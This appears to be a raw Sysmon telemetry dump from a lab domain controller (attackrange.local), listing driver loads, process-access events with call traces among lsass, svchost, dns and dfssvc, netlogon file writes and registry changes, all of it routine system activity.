12:00:39.612C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 10341000x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.752{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.596C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=6E1503F4069613AB8064509A55137640,SHA256=FE42D2C661087DD60C360AFAA648FC33F5C1B0D70422F7EC5477A6CE52712C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A700430E120F8F974E4E14AD9E872E14,SHA256=6DC51FB2754214EF446248A8CDA5AAA1CCD015C621B8C58DDC68454B7CFCC95B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:24.689{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 17141700x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:24.299{266CAFBE-647D-6064-3200-00000000AE01}2716\Winsock2\CatalogChangeListener-a9c-0C:\Windows\system32\dns.exe 13241300x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:24.299{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-892.attackrange.local 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\